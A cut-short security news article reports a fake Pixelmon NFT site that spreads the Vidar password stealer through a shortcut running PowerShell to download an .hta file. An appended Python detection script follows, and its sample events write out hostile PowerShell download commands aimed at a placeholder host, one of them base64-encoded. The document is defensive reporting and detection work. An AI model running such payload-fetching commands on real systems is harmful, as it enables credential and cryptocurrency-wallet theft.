Alert! Scam Pixelmon NFT Website Hosts Password-stealing Malware

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents

A bogus Pixelmon NFT site tempts visitors with free tokens and collectables while infecting them with spyware that steals their cryptocurrency wallets. Pixelmon is a popular NFT project with plans to create an online metaverse game where users can gather, train, and battle other players with Pixelmon pets.
The project has attracted a lot of attention, with nearly 200,000 Twitter followers and over 25,000 Discord members. To take advantage of this interest, threat actors have replicated the original pixelmon.club website and built a fake version at pixelmon[.]pw to deliver malware. Instead of providing a demo of the project’s game, the malicious site provides executables that install password-stealing malware on a device.
The website is selling a package named Installer.zip that contains a faulty executable that does not infect customers with malware. However, MalwareHunterTeam, which was the first to identify this malicious site, detected other dangerous files distributed by it, which made it possible to see what malware it was spreading. Setup.zip, which contains the setup.lnk file, is one of the files served by this fraudulent site. Setup.lnk is a Windows shortcut that runs a PowerShell command to download the system32.hta file from pixelmon[.]pw.
When BleepingComputer tested these malicious payloads, the System32.hta file downloaded Vidar, a password-stealing m

[…]
Content was cut in order to protect the source. Please visit the source for the rest of the article.
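The chain described above (a shortcut that launches PowerShell to fetch an .hta file) can be hunted for in process-creation logs. The Python below is an added example, not code from the article or from the researchers it cites. The event field names, the sample events and the host files.example.invalid are constructed, and the decoding of -EncodedCommand arguments goes beyond what the article describes.

```python
import base64
import re
from pathlib import PureWindowsPath

# http(s) URL whose path ends in .hta, optionally followed by a query or fragment
HTA_URL = re.compile(r"https?://[^\s'\"()]+?\.hta(?=[?#'\"\s)]|$)", re.IGNORECASE)
# any "-switch <base64-looking argument>" pair; the switch name is checked below
SWITCH_ARG = re.compile(r"[-/](\w+)\s+([A-Za-z0-9+/=]{16,})")

def candidate_texts(cmd):
    """Yield (text, was_encoded): the raw command line, then decoded -EncodedCommand payloads."""
    yield cmd, False
    for name, blob in SWITCH_ARG.findall(cmd):
        name = name.lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...)
        if name == "ec" or "encodedcommand".startswith(name):
            try:
                yield base64.b64decode(blob, validate=True).decode("utf-16-le"), True
            except ValueError:  # not valid base64, or not UTF-16LE text
                continue

def find_hta_downloads(events):
    """Return one finding per PowerShell process whose command references a remote .hta."""
    findings = []
    for ev in events:
        if PureWindowsPath(ev["image"]).name.lower() not in {"powershell.exe", "pwsh.exe"}:
            continue
        for text, encoded in candidate_texts(ev["command_line"]):
            match = HTA_URL.search(text)
            if match:
                # a shortcut opened by the user runs its target as a child of explorer.exe
                parent = PureWindowsPath(ev["parent_image"]).name.lower()
                findings.append({"url": match.group(0), "encoded": encoded, "from_shell": parent == "explorer.exe"})
                break
    return findings

# Constructed process-creation events (not taken from the article); the host is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_enc = base64.b64encode("iwr https://files.example.invalid/a/Setup.HTA?x=1 -OutFile s.hta".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -w hidden -c "iwr http://files.example.invalid/system32.hta -OutFile $env:TEMP\s.hta"'},
    {"image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": f"powershell.exe -NoP -enc {_enc}"},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users -ErrorAction SilentlyContinue"},
]

if __name__ == "__main__":
    print(find_hta_downloads(SAMPLE_EVENTS))
```

The `from_shell` flag marks PowerShell started directly by explorer.exe, which is how a double-clicked .lnk appears in process telemetry.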
